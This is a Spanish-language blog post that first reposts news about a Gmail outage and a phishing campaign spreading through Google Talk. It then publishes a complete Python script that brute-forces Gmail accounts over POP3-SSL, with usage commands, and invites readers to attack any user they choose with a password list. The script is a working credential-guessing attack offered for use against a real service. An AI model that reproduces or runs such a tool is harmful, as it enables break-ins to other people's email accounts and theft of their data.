kernelpanic.org.mx

Las réplicas del colapso de Gmail aún se hacen sentir durante la mañana del 2 de septiembre. En el grupo #googlefail de Twitter aún se informa sobre problemas de acceso e inestabilidad para algunos de los 150 millones de usuarios de Gmail.

Según el blog de Google, la caída de Gmail se debería a un nivel excesivo de tráfico en sus servidores. En otras palabras, Google está teniendo problemas de crecimiento, y aún con su enorme parque de servidores no logra gestionar todo el tráfico que generan sus servicios.

Ben Treynor, empleado de Google, explica la situación en el blog de la empresa: “Alrededor de las 12:30, hora del Pacífico, algunos de nuestros enrutadores se vieron desbordados, por lo que redireccionaron el tráfico hacia otros enrutadores. La situación se replicó, por lo que en el transcurso de pocos minutos todos los enrutadores dejaron de funcionar. Así, los usuarios de Gmail no pudieron conectarse al servicio mediante su navegador, debido a que las llamadas al servidor no podían ser direccionadas a un servidor de Gmail. IMAP y POP continuaron funcionando normalmente. Lo mismo ocurrió con la gestión del correo electrónico, debido a que estos procesos no usan los mismos enrutadores que se vieron afectados por el problema técnico”.

No es la primera vez que Gmail queda fuera de servicio. Situaciones similares ocurrieron en febrero, marzo y mayo.

Fuente: Blog oficial de Google

El pasado martes, durante cerca de cuatro horas, el servicio de correo electrónico de Google, Gmail, dejó de funcionar. Pese a no haber hecho público el número de personas a las que afectó este apagón, la compañía si ha explicado las causas de la caída de su página de correo electrónico.

Así, la empresa de Internet ha notificado a través de un comunicado que el problema comenzó durante un servicio de mantenimiento rutinario de un centro de datos europeo, lo que coincidió con la introducción de un nuevo código para dar más proximidad al servicio. El fallo de un servidor provocó la sobrecarga de otro centro de datos, lo que llevó a un efecto cascada que terminó afectando a diversos centros.

Aunque con este comunicado, Google desmiente que la caída del servicio se haya debido a un ataque externo, lo cierto es que, recientemente, la seguridad de su sistema de correo ha quedado en entredicho tras descubrirse una amenaza de phishing contra el sistema de mensajería instantánea de Gmail.

A este respecto, Sophos advierte a los usuarios de Gmail de estar alerta sobre estos ataques de phishing, tras la noticia de que el sistema de correo electrónico de Google ha sido objeto de una campaña de robo de identidad, ataque que se extendió a través de su sistema de mensajería instantánea (Google Talk).

Los ejemplos analizados por el laboratorio de Sophos revelan la aparición de mensajes instantáneos no solicitados en la pantalla de los usuarios, que con el anuncio: “check out this video” (comprueba este vídeo), instan a éstos a pinchar sobre un link vía el servicio de TinyURL. El enlace, sin embargo, redirecciona a los usuarios a un sitio web denominado WiddyHo, donde se les requiere su nombre de usuario de Gmail y su contraseña. En este sentido, los expertos de Sophos advierten que los hackers que están detrás de WiddyHo podrían utilizar la información sustraída para entrar en las cuentas personales, hacerse con datos claves y, en definitiva, cometer robo de identidad.

“Todos recibimos información sospechosa a través del correo electrónico. Sin embargo, en esta ocasión, estos ataques han sido realizados a través del sistema de mensajería instantánea de Gmail, lo que entraña que muchos usuarios, que se creen seguros, puedan caer en la trampa sin ser conscientes de ello”, afirma Graham Cluley, consultor de tecnología de Sophos.

Aunque TinyURL ya ha puesto el sitio en la lista negra -lo que quiere decir que el link no funcionará-, esta acción no frenará la habilidad de los hackers que utilizarán otros sitios de rediccionamiento URL o prepararán alojamientos alternativos de phishing para intentar robar a los incautos.

fuente: diarioTI

Aqui les paso el codio en python para hacer brute force a gmail, solo necesitas hacer dos documentos uno es un archivo con el usuario que quieres atacar y el otro es el archivo del passlist.

#!usr/bin/python
#Gmail Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, poplib
from copy import copy

if len(sys.argv) !=3:
print “\n\t   d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0″
print “\t   ————————————————–\n”
print “\t    Usage: ./gmailpopbrute.py <userlist> <wordlist>\n”
sys.exit(1)

server = “pop.gmail.com”
success = []

try:
users = open(sys.argv[1], “r”).readlines()
except(IOError):
print “[-] Error: Check your userlist path\n”
sys.exit(1)

try:
words = open(sys.argv[2], “r”).readlines()
except(IOError):
print “[-] Error: Check your wordlist path\n”
sys.exit(1)

try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = “No Response”
pass

print “\n\t   d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0″
print “\t   ————————————————–\n”
print “[+] Server:”,server
print “[+] Port: 995″
print “[+] Users Loaded:”,len(users)
print “[+] Words Loaded:”,len(words)
print “[+] Server response:”,welcome,”\n”

wordlist = copy(words)

def reloader():
for word in wordlist:
words.append(word)

def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words,  1)
words.remove(value[0])

else:
print “[-] Reloading Wordlist – Changing User\n”
reloader()
value = random.sample(words,  1)
users.remove(users[0])

lock.release()
if len(users) ==1:
return value[0], users[0]
else:
return value[0], users[0]

class Worker(threading.Thread):

def run(self):
value, user = getword()
user = user.replace(“\n”,”")
value = value.replace(“\n”,”")

try:
print “-”*12
print “[+] User:”,user,”Password:”,value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
print “\t\t\n\nLogin successful:”,user, value
print “\t\tMail:”,pop.stat()[0],”emails”
print “\t\tSize:”,pop.stat()[1],”bytes\n\n”
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
except (poplib.error_proto), msg:
#print “An error occurred:”, msg
pass

for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
if len(success) >=1:
print “\n\n[+] Login successful:”,success[0], success[1]
print “\t[+] Mail:”,success[2],”emails”
print “\t[+] Size:”,success[3],”bytes\n”
print “\n[-] Done”

——————————————————————————————————————————————

Lo guardamos como gmailpopbrute.py y despues lo corremos.

#python gmailpopbrute.py user passlist

o bien.

#./gmailpopbrute.py user passlist

Saludos raza.